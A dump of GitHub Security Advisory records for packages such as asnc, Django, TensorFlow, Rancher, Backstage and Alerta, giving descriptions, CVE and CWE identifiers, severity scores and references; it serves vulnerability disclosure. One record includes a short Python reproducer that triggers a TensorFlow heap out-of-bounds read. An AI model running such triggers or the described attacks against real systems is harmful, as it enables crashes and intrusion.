2021-04-13T15:17:36Z
2021-04-13T15:17:36Z
HIGH
9.8
{'CWE-78'}
{'https://github.com/advisories/GHSA-qfxv-qqvg-24pg', 'https://nvd.nist.gov/vuln/detail/CVE-2019-10788', 'https://github.com/Turistforeningen/node-im-metadata/commit/ea15dddbe0f65694bfde36b78dd488e90f246639', 'https://snyk.io/vuln/SNYK-JS-IMMETADATA-544184'}
null
GHSA
GHSA-2p99-6f47-8x9j
Malicious Package in asnc
All versions of `asnc` typosquatted a popular package of similar name and tracked users who had installed the incorrect package. The package uploaded information to a remote server including: name of the downloaded package, name of the intended package, the Node version and whether the process was running as sudo. There is no further compromise. ## Recommendation Remove the package from your dependencies and always ensure package names are typed correctly upon installation.
null
2021-10-01T13:55:37Z
2020-09-02T18:38:39Z
CRITICAL
9.8
{'CWE-506'}
{'https://github.com/advisories/GHSA-2p99-6f47-8x9j', 'https://www.npmjs.com/advisories/845'}
null
GHSA
GHSA-j239-4gqg-5j54
Inadequate Encryption Strength
Primetek Primefaces 5.x is vulnerable to a weak encryption flaw resulting in remote code execution
{'CVE-2017-1000486'}
2021-06-03T19:22:22Z
2021-06-03T19:22:22Z
CRITICAL
9.8
{'CWE-326'}
{'https://www.exploit-db.com/exploits/43733/', 'https://cryptosense.com/weak-encryption-flaw-in-primefaces/', 'https://nvd.nist.gov/vuln/detail/CVE-2017-1000486', 'https://github.com/advisories/GHSA-j239-4gqg-5j54', 'http://blog.mindedsecurity.com/2016/02/rce-in-oracle-netbeans-opensource.html', 'https://github.com/primefaces/primefaces/issues/1152'}
null
GHSA
GHSA-c8xf-m4ff-jcxj
Moderate severity vulnerability that affects org.bouncycastle:bcprov-jdk14 and org.bouncycastle:bcprov-jdk15
In the Bouncy Castle JCE Provider version 1.55 and earlier the primary engine class used for AES was AESFastEngine. Due to the highly table driven approach used in the algorithm it turns out that if the data channel on the CPU can be monitored the lookup table accesses are sufficient to leak information on the AES key being used. There was also a leak in AESEngine although it was substantially less. AESEngine has been modified to remove any signs of leakage (testing carried out on Intel X86-64) and is now the primary AES class for the BC JCE provider from 1.56. Use of AESFastEngine is now only recommended where otherwise deemed appropriate.
{'CVE-2016-1000339'}
2021-09-08T21:44:47Z
2018-10-17T16:23:38Z
MODERATE
5.3
null
{'https://nvd.nist.gov/vuln/detail/CVE-2016-1000339', 'https://usn.ubuntu.com/3727-1/', 'https://github.com/bcgit/bc-java/commit/413b42f4d770456508585c830cfcde95f9b0e93b#diff-54656f860db94b867ba7542430cd2ef0', 'https://github.com/advisories/GHSA-c8xf-m4ff-jcxj', 'https://www.oracle.com/security-alerts/cpuoct2020.html', 'https://lists.debian.org/debian-lts-announce/2018/07/msg00009.html', 'https://security.netapp.com/advisory/ntap-20181127-0004/', 'https://access.redhat.com/errata/RHSA-2018:2669', 'https://github.com/bcgit/bc-java/commit/8a73f08931450c17c749af067b6a8185abdfd2c0#diff-494fb066bed02aeb76b6c005632943f2', 'https://access.redhat.com/errata/RHSA-2018:2927'}
null
GHSA
GHSA-57hg-26h7-9qgv
pimcore is vulnerable to Cross-site Scripting
pimcore is vulnerable to Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')
{'CVE-2022-0256'}
2022-01-25T20:49:11Z
2022-01-21T23:48:07Z
MODERATE
5.4
{'CWE-79'}
{'https://github.com/advisories/GHSA-57hg-26h7-9qgv', 'https://huntr.dev/bounties/8d88e48a-7124-4aaf-9f1d-6cfe4f9a79c1', 'https://github.com/pimcore/pimcore/commit/dff1cb0c466abcd55f1268934de3ed937b7436a7', 'https://nvd.nist.gov/vuln/detail/CVE-2022-0256'}
null
GHSA
GHSA-m6m5-pp4g-fcc8
S3 storage write is not aborted on errors leading to unbounded memory usage
### Impact Anyone using storage.blob.s3 introduced in 0.5.0 with storage.imapsql. ``` storage.imapsql local_mailboxes { ... msg_store s3 { ... } } ``` ### Patches The relevant commit is pushed to master and will be included in the 0.5.1 release. No special handling of the issue has been done due to the small amount of affected users. ### Workarounds None. ### References * Original report: https://github.com/foxcpp/maddy/issues/395 * Fix: https://github.com/foxcpp/maddy/commit/07c8495ee4394fabbf5aac4df8aebeafb2fb29d8
null
2021-10-06T17:47:35Z
2021-10-06T17:47:35Z
HIGH
7.5
{'CWE-772'}
{'https://github.com/advisories/GHSA-m6m5-pp4g-fcc8', 'https://github.com/foxcpp/maddy/security/advisories/GHSA-m6m5-pp4g-fcc8'}
null
GHSA
GHSA-xhg2-rvm8-w2jh
Cross-site Request Forgery (CSRF)
Rancher 2 through 2.2.4 is vulnerable to a Cross-Site Websocket Hijacking attack that allows an exploiter to gain access to clusters managed by Rancher. The attack requires a victim to be logged into a Rancher server, and then to access a third-party site hosted by the exploiter. Once that is accomplished, the exploiter is able to execute commands against the cluster's Kubernetes API with the permissions and identity of the victim.
{'CVE-2019-13209'}
2022-04-25T20:20:19Z
2021-05-18T15:42:40Z
HIGH
8.7
{'CWE-352', 'CWE-79'}
{'https://github.com/advisories/GHSA-xhg2-rvm8-w2jh', 'https://forums.rancher.com/c/announcements', 'https://nvd.nist.gov/vuln/detail/CVE-2019-13209', 'https://github.com/rancher/rancher/commit/0ddffe484adccb9e37d9432e8e625d8ebbfb0088', 'https://forums.rancher.com/t/rancher-release-v2-2-5-addresses-rancher-cve-2019-13209/14801'}
null
GHSA
GHSA-wq7q-7vfh-2x3h
Downloads Resources over HTTP in install-nw
Affected versions of `install-nw` insecurely download an executable over an unencrypted HTTP connection. In scenarios where an attacker has a privileged network position, it is possible to intercept the response and replace the executable with a malicious one, resulting in code execution on the system running `install-nw`. ## Recommendation Update to version 1.1.5 or later.
{'CVE-2016-10566'}
2021-01-08T01:39:02Z
2019-02-18T23:54:09Z
HIGH
0
{'CWE-311'}
{'https://nvd.nist.gov/vuln/detail/CVE-2016-10566', 'https://github.com/advisories/GHSA-wq7q-7vfh-2x3h', 'https://www.npmjs.com/advisories/204', 'https://nodesecurity.io/advisories/204'}
null
GHSA
GHSA-wpg7-2c88-r8xv
Exposure of Sensitive Information in simple-get
In versions of simple-get prior to 4.0.1, 3.1.1, and 2.8.2, when fetching a remote url with a cookie location response, headers will be followed, potentially resulting in an exposure of the session cookie to a third party.
{'CVE-2022-0355'}
2022-02-03T16:08:57Z
2022-01-28T22:54:16Z
HIGH
7.5
{'CWE-200'}
{'https://github.com/feross/simple-get/commit/e4af095e06cd69a9235013e8507e220a79b9684f', 'https://github.com/feross/simple-get/pull/76#issuecomment-1027754710', 'https://github.com/feross/simple-get/pull/75#issuecomment-1027755026', 'https://huntr.dev/bounties/42c79c23-6646-46c4-871d-219c0d4b4e31', 'https://nvd.nist.gov/vuln/detail/CVE-2022-0355', 'https://github.com/advisories/GHSA-wpg7-2c88-r8xv'}
null
GHSA
GHSA-vx8q-j7h9-vf6q
Exposure of Sensitive Information to an Unauthorized Actor in PhpMyAdmin
PhpMyAdmin before 5.1.3 allows an attacker to retrieve potentially sensitive information by creating invalid requests. This affects the lang parameter, the pma_parameter, and the cookie section.
{'CVE-2022-0813'}
2022-03-17T21:44:09Z
2022-03-11T00:02:24Z
HIGH
7.5
{'CWE-200'}
{'https://nvd.nist.gov/vuln/detail/CVE-2022-0813', 'https://www.incibe-cert.es/en/early-warning/security-advisories/phpmyadmin-exposure-sensitive-information', 'https://github.com/advisories/GHSA-vx8q-j7h9-vf6q', 'https://www.phpmyadmin.net/news/2022/2/11/phpmyadmin-4910-and-513-are-released/'}
null
GHSA
GHSA-p62g-jhg6-v3rq
Code Injection, Race Condition, and Execution with Unnecessary Privileges in Ansible
A flaw was found in Ansible Engine, all versions 2.7.x, 2.8.x and 2.9.x prior to 2.7.17, 2.8.9 and 2.9.6 respectively, when using ansible_facts as a subkey of itself and promoting it to a variable when inject is enabled, overwriting the ansible_facts after the clean. An attacker could take advantage of this by altering the ansible_facts, such as ansible_hosts, users and any other key data which would lead into privilege escalation or code injection.
{'CVE-2020-10684'}
2022-01-04T18:54:45Z
2021-04-07T20:37:06Z
LOW
7.1
{'CWE-94', 'CWE-862', 'CWE-362', 'CWE-250'}
{'https://nvd.nist.gov/vuln/detail/CVE-2020-10684', 'https://security.gentoo.org/glsa/202006-11', 'https://www.debian.org/security/2021/dsa-4950', 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/WQVOQD4VAIXXTVQAJKTN7NUGTJFE2PCB/', 'https://github.com/advisories/GHSA-p62g-jhg6-v3rq', 'https://bugzilla.redhat.com/show_bug.cgi?id=CVE-2020-10684', 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/DKPA4KC3OJSUFASUYMG66HKJE7ADNGFW/', 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/MRRYUU5ZBLPBXCYG6CFP35D64NP2UB2S/'}
null
GHSA
GHSA-39qv-prmh-x37f
Prototype Pollution in @strikeentco/set
This affects the package @strikeentco/set before 1.0.2. It allows an attacker to cause a denial of service and may lead to remote code execution. **Note:** This vulnerability derives from an incomplete fix in https://security.snyk.io/vuln/SNYK-JS-STRIKEENTCOSET-1038821
{'CVE-2021-23497'}
2022-02-11T16:16:33Z
2022-02-05T00:00:26Z
HIGH
7.5
{'CWE-1321'}
{'https://snyk.io/vuln/SNYK-JS-STRIKEENTCOSET-2385945', 'https://nvd.nist.gov/vuln/detail/CVE-2021-23497', 'https://github.com/advisories/GHSA-39qv-prmh-x37f', 'https://security.snyk.io/vuln/SNYK-JS-STRIKEENTCOSET-1038821', 'https://snyk.io/blog/remediate-javascript-type-confusion-bypassed-input-validation/', 'https://github.com/strikeentco/set/commit/b2f942c'}
null
GHSA
GHSA-wwrj-35w6-77ff
CSRF vulnerability in save-server
### Impact Versions prior to version v1.05 are affected by a CSRF vulnerability, as there is no CSRF mitigation (Tokens etc.). The fix introduced in version v1.05 unintentionally breaks uploading so version v1.0.7 is the fixed version. This is patched by implementing [Double submit](https://medium.com/cross-site-request-forgery-csrf/double-submit-cookie-pattern-65bb71d80d9f). The CSRF attack would require you to navigate to a malicious site while you have an active session with Save-Server (Session key stored in cookies). The malicious user would then be able to perform some actions, including: - Upload file - Delete file - Add redirect #### If you are logged in as root, this attack is significantly more severe. They can (in addition to the above): - Create users - Delete users - Update users (change password) If they updated the password of a user, that user's files would then be available. If the root password is updated, all files would be visible if they logged in with the new password. Note that due to the same origin policy malicious actors cannot view the gallery or the response of any of the methods, nor be sure they succeeded. ### Patches This issue has been patched. Update to version v1.0.7 or above to benefit from this fix. ### Workarounds None. You should upgrade. ### References What is CSRF: https://owasp.org/www-community/attacks/csrf Fix type: https://medium.com/cross-site-request-forgery-csrf/double-submit-cookie-pattern-65bb71d80d9f ### For more information If you have any questions or comments about this advisory: * Open an issue in [Save-server](https://github.com/Neztore/save-server/) * Email us at [hi@nezto.re](mailto:hi@nezto.re) * Join our discord (preferred): [Invite](https://discord.gg/QevWabU)
{'CVE-2020-15135'}
2021-01-07T23:42:19Z
2020-08-04T14:54:08Z
MODERATE
6.7
{'CWE-352'}
{'https://medium.com/cross-site-request-forgery-csrf/double-submit-cookie-pattern-65bb71d80d9f', 'https://github.com/advisories/GHSA-wwrj-35w6-77ff', 'https://github.com/Neztore/save-server/security/advisories/GHSA-wwrj-35w6-77ff', 'https://nvd.nist.gov/vuln/detail/CVE-2020-15135', 'https://www.npmjs.com/package/save-server'}
null
GHSA
GHSA-h2rj-8wgg-mm43
Cross-site Scripting in craftcms
Craft CMS before 3.6.13 has an XSS vulnerability.
{'CVE-2021-32470'}
2022-03-21T20:41:37Z
2022-03-18T17:53:37Z
MODERATE
6.1
{'CWE-79'}
{'https://github.com/craftcms/cms/commit/f9378aa154b5f9b64bed3d59cce0c4a8184bf5e6', 'https://github.com/craftcms/cms/blob/develop/CHANGELOG.md#3613---2021-05-04', 'https://nvd.nist.gov/vuln/detail/CVE-2021-32470', 'https://github.com/advisories/GHSA-h2rj-8wgg-mm43'}
null
GHSA
GHSA-64wv-8vwp-xgw2
Use of Uninitialized Resource in ash.
An issue was discovered in the ash crate before 0.33.1 for Rust. util::read_spv may read from uninitialized memory locations.
{'CVE-2021-45688'}
2022-01-07T17:19:25Z
2022-01-06T22:13:02Z
CRITICAL
9.8
{'CWE-908'}
{'https://nvd.nist.gov/vuln/detail/CVE-2021-45688', 'https://github.com/advisories/GHSA-64wv-8vwp-xgw2', 'https://rustsec.org/advisories/RUSTSEC-2021-0090.html', 'https://raw.githubusercontent.com/rustsec/advisory-db/main/crates/ash/RUSTSEC-2021-0090.md'}
null
GHSA
GHSA-qr32-j4j6-3m7r
Command Injection in fs-git
Affected versions of `fs-git` do not sanitize strings passed into the `buildCommand` method, resulting in arbitrary code execution. ## Recommendation Update to version 1.0.2 or later.
{'CVE-2017-16087'}
2021-08-04T20:06:57Z
2019-05-29T20:23:00Z
HIGH
0
{'CWE-77'}
{'https://github.com/vvakame/fs-git/commit/eb5f70efa5cfbff1ab299fa7daaa5de549243998', 'https://github.com/vvakame/fs-git/commit/eb5f70efa5cfbff1ab299fa7daaa5de549243998#diff-13b5b151431c7e7a17f273559ed212d5', 'https://nvd.nist.gov/vuln/detail/CVE-2017-16087', 'https://www.npmjs.com/advisories/360', 'https://github.com/advisories/GHSA-qr32-j4j6-3m7r'}
null
GHSA
GHSA-xpfp-f569-q3p2
SQL Injection in Django
Django 3.1.x before 3.1.13 and 3.2.x before 3.2.5 allows QuerySet.order_by SQL injection if order_by is untrusted input from a client of a web application.
{'CVE-2021-35042'}
2022-03-03T20:45:47Z
2021-09-22T17:34:49Z
CRITICAL
9.8
{'CWE-89'}
{'https://nvd.nist.gov/vuln/detail/CVE-2021-35042', 'https://docs.djangoproject.com/en/3.2/releases/security/', 'https://github.com/advisories/GHSA-xpfp-f569-q3p2', 'https://github.com/django/django/commit/0bd57a879a0d54920bb9038a732645fb917040e9', 'https://security.netapp.com/advisory/ntap-20210805-0008/', 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/SS6NJTBYWOX6J7G4U3LUOILARJKWPQ5Y/', 'https://www.djangoproject.com/weblog/2021/jul/01/security-releases/', 'https://www.openwall.com/lists/oss-security/2021/07/02/2', 'https://groups.google.com/forum/#!forum/django-announce'}
null
GHSA
GHSA-5hmm-x8q8-w5jh
LDAP authentication bypass with empty password
### Impact Users may be able to bypass LDAP authentication if they provide an empty password when Alerta server is configure to use LDAP as the authorization provider. Only deployments where LDAP servers are configured to allow unauthenticated binds (eg. default on Active Directory) are affected. ### Patches A fix has been implemented that returns HTTP 401 Unauthorized response for any authentication attempts where the password field is empty. See https://github.com/alerta/alerta/pull/1345 ### Workarounds LDAP administrators can disallow unauthenticated bind requests by clients. ### References https://tools.ietf.org/html/rfc4513#section-5.1.2 https://pypi.org/project/alerta-server/8.1.0/ ### For more information If you have any questions or comments about this advisory: * Add a comment to the issue [#1277](https://github.com/alerta/alerta/issues/1277) * Email us at [admin@alerta.dev](mailto:admin@alerta.dev)
{'CVE-2020-26214'}
2022-04-19T19:02:39Z
2020-11-06T17:35:49Z
HIGH
9.1
{'CWE-287'}
{'https://github.com/alerta/alerta/security/advisories/GHSA-5hmm-x8q8-w5jh', 'https://tools.ietf.org/html/rfc4513#section-5.1.2', 'https://github.com/alerta/alerta/commit/2bfa31779a4c9df2fa68fa4d0c5c909698c5ef65', 'https://github.com/alerta/alerta/pull/1345', 'https://github.com/alerta/alerta/issues/1277', 'https://github.com/advisories/GHSA-5hmm-x8q8-w5jh', 'https://nvd.nist.gov/vuln/detail/CVE-2020-26214', 'https://pypi.org/project/alerta-server/8.1.0/'}
null
GHSA
GHSA-8h2g-r292-j8xh
L7 deny intention results in an allow action
In HashiCorp Consul before 1.10.1 (and Consul Enterprise), xds can generate a situation where a single L7 deny intention (with a default deny policy) results in an allow action.
{'CVE-2021-36213'}
2021-10-05T17:32:02Z
2021-07-19T21:21:12Z
HIGH
7.5
null
{'https://github.com/hashicorp/consul/releases/tag/v1.10.1', 'https://www.hashicorp.com/blog/category/consul', 'https://discuss.hashicorp.com/t/hcsec-2021-16-consul-s-application-aware-intentions-deny-action-fails-open-when-combined-with-default-deny-policy/26855', 'https://github.com/advisories/GHSA-8h2g-r292-j8xh', 'https://nvd.nist.gov/vuln/detail/CVE-2021-36213'}
null
GHSA
GHSA-pvv8-8fx9-h673
Path Traversal in @backstage/plugin-scaffolder-backend
### Impact A malicious actor could read sensitive files from the environment where Scaffolder tasks are run. The attack is executed by crafting a custom Scaffolder template with a `publish:github:pull-request` action using a particular source path. When the template is executed the sensitive files would be included in the published pull request. This vulnerability is mitigated by the fact that an attacker would need access to create and register templates in the Backstage catalog, and that the attack is very visible given that the exfiltration happens via a pull request. ### Patches The vulnerability is patched in the `0.15.9` release of `@backstage/plugin-scaffolder-backend`. ### For more information If you have any questions or comments about this advisory: * Open an issue in the [Backstage repository](https://github.com/backstage/backstage) * Visit our chat, linked to in [Backstage README](https://github.com/backstage/backstage)
{'CVE-2021-41151'}
2021-10-25T20:07:48Z
2021-10-19T15:28:03Z
MODERATE
6.8
{'CWE-22'}
{'https://github.com/backstage/backstage/releases/tag/release-2021-10-16', 'https://github.com/backstage/backstage/commit/6968962c920508eae19a4c1c200fa2c8980a4006', 'https://github.com/backstage/backstage/security/advisories/GHSA-pvv8-8fx9-h673', 'https://github.com/advisories/GHSA-pvv8-8fx9-h673', 'https://nvd.nist.gov/vuln/detail/CVE-2021-41151'}
null
GHSA
GHSA-cg3q-59w7-rvc2
Reliance on Cookies without Validation and Integrity Checking in getgrav/grav
grav is vulnerable to Reliance on Cookies without Validation and Integrity Checking. A cookie with an overly broad path can be accessed through other applications on the same domain. Since cookies often carry sensitive information such as session identifiers, sharing cookies across applications can lead a vulnerability in one application to cause a compromise in another.
{'CVE-2021-3818'}
2021-10-04T14:11:39Z
2021-09-29T17:12:51Z
MODERATE
6.3
{'CWE-565'}
{'https://github.com/getgrav/grav/commit/c51fb1779b83f620c0b6f3548d4a96322b55df07', 'https://github.com/advisories/GHSA-cg3q-59w7-rvc2', 'https://huntr.dev/bounties/c2bc65af-7b93-4020-886e-8cdaeb0a58ea'}
null
GHSA
GHSA-fr77-rrx3-cp7g
Heap OOB read in `tf.ragged.cross`
### Impact The [shape inference code for `tf.ragged.cross`](https://github.com/tensorflow/tensorflow/blob/8d72537c6abf5a44103b57b9c2e22c14f5f49698/tensorflow/core/ops/ragged_array_ops.cc#L64) can trigger a read outside of bounds of heap allocated array: ```python import tensorflow as tf @tf.function def test(): y = tf.raw_ops.RaggedCross(ragged_values=[], ragged_row_splits=[], sparse_indices=[[5]], sparse_values=[], sparse_shape=[5], dense_inputs=[['a']], input_order='RD', hashed_output=False, num_buckets=5, hash_key=2, out_values_type=tf.string, out_row_splits_type=tf.int64) return y test() ``` ### Patches We have patched the issue in GitHub commit [fa6b7782fbb14aa08d767bc799c531f5e1fb3bb8](https://github.com/tensorflow/tensorflow/commit/fa6b7782fbb14aa08d767bc799c531f5e1fb3bb8). The fix will be included in TensorFlow 2.7.0. We will also cherrypick this commit on TensorFlow 2.6.1, TensorFlow 2.5.2, and TensorFlow 2.4.4, as these are also affected and still in supported range. ### For more information Please consult [our security guide](https://github.com/tensorflow/tensorflow/blob/master/SECURITY.md) for more information regarding the security model and how to contact us with issues and questions. ### Attribution This vulnerability has been reported by members of the Aivul Team from Qihoo 360.
{'CVE-2021-41212'}
2021-11-10T19:00:31Z
2021-11-10T19:00:31Z
HIGH
7.1
{'CWE-125'}
{'https://github.com/advisories/GHSA-fr77-rrx3-cp7g', 'https://nvd.nist.gov/vuln/detail/CVE-2021-41212', 'https://github.com/tensorflow/tensorflow/security/advisories/GHSA-fr77-rrx3-cp7g', 'https://github.com/tensorflow/tensorflow/commit/fa6b7782fbb14aa08d767bc799c531f5e1fb3bb8'}
null
GHSA
GHSA-w9fg-xffh-p362
Denial of service (via resource exhaustion) due to improper input validation on third-party identifier endpoints
### Impact Missing input validation of some parameters on the endpoints used to confirm third-party identifiers could cause excessive use of disk space and memory leading to resource exhaustion. ### Patches The issue is fixed by #9321. ### Workarounds Depending on the needs and configuration of the homeserver a few options are available: 1. Using email as third-party identifiers be disabled by not configuring the `email` setting. 2. Using phone numbers as third-party identifiers can be disabled by ensuring that `account_threepid_delegates.msisdn` is not configured. 3. Additionally, the affected endpoint patterns can be blocked at a reverse proxy: * `^/_matrix/client/(r0|unstable)/register/email` * `^/_matrix/client/(r0|unstable)/register/msisdn` * `^/_matrix/client/(r0|unstable)/account/password` * `^/_matrix/client/(r0|unstable)/account/3pid`
{'CVE-2021-21394'}
2021-08-31T21:08:03Z
2021-04-13T15:12:51Z
MODERATE
5.3
{'CWE-20'}
{'https://github.com/advisories/GHSA-w9fg-xffh-p362', 'https://github.com/matrix-org/synapse/pull/9393', 'https://github.com/matrix-org/synapse/pull/9321', 'https://nvd.nist.gov/vuln/detail/CVE-2021-21394', 'https://pypi.org/project/matrix-synapse/', 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/TNNAJOZNMVMXM6AS7RFFKB4QLUJ4IFEY/', 'https://github.com/matrix-org/synapse/security/advisories/GHSA-w9fg-xffh-p362'}
null